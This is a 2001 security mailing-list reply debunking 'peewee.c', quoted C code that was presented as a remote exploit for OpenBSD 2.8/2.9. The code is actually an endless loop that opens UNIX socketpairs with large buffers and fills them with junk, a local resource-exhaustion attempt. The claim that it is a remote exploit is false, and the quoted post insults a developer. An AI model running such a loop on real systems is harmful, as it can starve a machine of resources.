Re: proof of exploited code

[max <max () neuropunks org>]

The code doesnt do anything. I ran it on an obsd 2.8 machine and the state
of the machine after execution was same as before. From what i understand
from this code, it simply opens up a 2 local (PF_UNIX) sockets, and writes
some garbage to both of them. socket option calls change recieve and
send buffers on the socket, which i guess has something to do with the
size of the garbage we send to the local sockets. fcntl call sets non
block flag on the sockets (im not sure i understand what this is, and the
man pages are rather concise on this, but i guess it makes it a non-block
device?), and then two write calls, where the crap gets written into
sockets.
now, i am by no means an expert or even an experienced programmer, and
this analysis is my attempt to understand unix programming better, so
please, all flames are welcome. im posting this just to see if my
assumtions are correct, not to actually give a guru-level analysis. (so if
this isnt posted, i'll live)

thanks for letting me waste everyone's time : )

max

On Wed, 6 Jun 2001, Blue Boar wrote:

> I let this through so that it might be refuted.
>
> Now, I'm no expert on the socket calls... but it seems
> to me that if this were a remote exploit, there
> would have to be a destination IP address..or port
> number.. or, you know, some sort of shellcode or
> something.
>
> So what is it then, a fork bomb for the machine that runs it?
>
>                               Ryan
>
> Fsck Theo Dumbraadt wrote:
> > This code shows a remote exploit for opensbsd versions 2.8 and 2.9
> >
> > and can now be released to the public to break theo's 4 years without
> >
> > remote exploits sayings. I wrote it while people told me it could not
> >
> > happen on the list so here is your proofs bitch.
> >
> > //
> >
> > // peewee.c
> >
> > // peewee herman prove of consept this code will show all of the
> >
> > // world how vulnirable OpenBSD is and how Theo Dumbraadt is
> >
> > // not more than a liar copyraadt 2001 by Jigglypuff
> >
> > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> >
> > // this proggie is GPL licensed to those who use it keep my
> >
> > // credits and not be a lamer
> >
> > //
> >
> > #include        <unistd.h>
> >
> > #include        <sys/socket.h>
> >
> > #include        <fcntl.h>
> >
> > #define         BUFFERSIZE      409600
> >
> > extern  int
> >
> > main(void)
> >
> > {
> >
> >         int             p[2], i;
> >
> >         char            crap[BUFFERSIZE];
> >
> >         while (1)
> >
> >         {
> >
> >                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> >
> >                         break;
> >
> >                 i = BUFFERSIZE;
> >
> >                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >
> >                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >
> >                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >
> >                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >
> >                 fcntl(p[0], F_SETFL, O_NONBLOCK);
> >
> >                 fcntl(p[1], F_SETFL, O_NONBLOCK);
> >
> >                 write(p[0], crap, BUFFERSIZE);
> >
> >                 write(p[1], crap, BUFFERSIZE);
> >
> >         }
> >
> >         return(0);
> >
> > }
> >
> > * Get your free email at http://www.inbox.net